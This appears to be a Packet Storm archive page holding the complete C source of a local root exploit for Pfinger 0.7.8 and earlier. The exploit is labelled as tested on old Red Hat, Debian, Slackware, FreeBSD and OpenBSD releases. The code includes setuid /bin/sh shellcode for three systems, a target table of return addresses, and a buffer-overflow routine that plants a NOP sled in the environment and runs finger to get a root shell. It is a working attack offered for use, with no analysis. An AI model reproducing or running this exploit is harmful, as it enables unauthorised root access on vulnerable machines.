Pfinger v0.7.8 and below local root exploit. Tested on Red Hat 7.2 - 8.0, Debian 3.0, Slackware 8.0, FreeBSD-4.6 and OpenBSD-3.1.
9fbe81eca5b8a20bbd07cedad950a4ee9e6eee2f91c30870c1a8c42c4f96d821/*
* !!PRIVATE!! DON'T DISTRIBUTE !!
* L33TSecurity - confidential source
*
* Pfinger-0.7.8 <= Local Exploit
* By Dvdman@L33TSECURITY.COM
* GREETS: UPB,JDUCK
* Thanks for all the C help UPB :)
*
* L33TSecurity - confidential source
* !!PRIVATE!! DON'T DISTRIBUTE !!
*/
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#define MAX_ARCH 8
//Linux Setuid Shellcode
char linuxshellcode[] =
"\x31\xdb\x89\xd8\xb0\x17\xcd\x80"
"\xeb\x16\x31\xdb\x31\xc9\xf7\xe1"
"\x5b\xb0\x0b\x88\x53\x07\x52\x53"
"\x89\xe1\xcd\x80\xb0\x01\xcd\x80"
"\xe8\xe5\xff\xff\xff/bin/sh";
//FreeBSD Setuid Shellcode
char freebsdshellcode[]=
"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f"
"\x62\x69\x6e\x89\xe3\x50\x53\x50\x54\x53"
"\xb0\x3b\x50\xcd\x80";
//OpenBsd shellcode
char openbsdshellcode[]=
"\x99" /* cdq */
"\x52" /* push %edx */
"\x68\x6e\x2f\x73\x68" /* push $0x68732f6e */
"\x68\x2f\x2f\x62\x69" /* push $0x69622f2f */
"\x89\xe3" /* mov %esp,%ebx */
"\x52" /* push %edx */
"\x54" /* push %esp */
"\x53" /* push %ebx */
"\x53" /* push %ebx */
"\x6a\x3b" /* push $0x3b */
"\x58" /* pop %eax */
"\xcd\x80"; /* int $0x80 */
struct TARGET {
char *type;
char *shellcode;
unsigned long ret_addr;
int pad;
};
struct TARGET targets [] = {
{"Redhat 7.2 -x86 setuid shellcode", linuxshellcode, 0xbfffff92,124},
{"Redhat 7.3 -x86 setuid shellcode", linuxshellcode, 0xbfffff92,124},
{"Redhat 8.0 -x86 setuid shellcode", linuxshellcode, 0xbfffff92,124},
{"Debian 3.0 -x86 shellcode", linuxshellcode, 0xbfffff96,88},
{"Slackware 8.0 -x86 shellcode",linuxshellcode, 0xbfffff96,88},
{"Freebsd 4.6-RELEASE -x86 shellcode",freebsdshellcode,0xbfbffe43,88},
{"Freebsd 4.7-RC -x6 shellcode",freebsdshellcode,0xbfbffe43,88},
{"OpenBsd 3.1 -x86 shellcode",openbsdshellcode,0xdfbfdb8e,88},
{NULL, NULL, 0}
};
void ussage (char *argv);
int main(int argc, char **argv) {
char buffer[2000];
int x,i,blah;
int target;
int arch;
char *ptr;
long *longptr;
char shell[512];
if ((argc < 2))
ussage(argv[0]);
target = atoi(argv[1]);
// Building the Buffer
bzero(&buffer, sizeof(buffer));
memset(buffer,'A',targets[target].pad); //size of info
memset(buffer+strlen(buffer),'B',4);
memset(buffer+strlen(buffer),'C',4);
memset(buffer+strlen(buffer),'D',4);
memset(buffer+strlen(buffer),'E',4);
*(unsigned long *)(buffer+strlen(buffer))=targets[target].ret_addr; //return address
memcpy(buffer+strlen(buffer),"\xC4\xC3\xC2\xC1\x45\x53\x80\x80",9); //sets ARGC>0x7FFFFFFF
//setting shellcode to ENVSPACE
memset(shell,0x90,100);
memcpy(&shell[100-strlen(targets[target].shellcode)],targets[target].shellcode,strlen(targets[target].shellcode));
memcpy(shell,"SHELLCODE=",10);
putenv(shell);
execl("./finger", "finger", buffer, NULL);
}
void list_targets () {
int i;
for (i=0; targets[i].type != NULL; i++) {
fprintf (stderr, "%d) - %s\n", i, targets[i].type);
}
}
void ussage (char *argv) {
printf ("%s - pfinger local root, user, whatever exploit\n", argv);
printf ("written by dvdman\n\n");
printf ("Ussage %s <target type> \ntargets avalible:\n\n");
list_targets ();
exit(0);
}
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed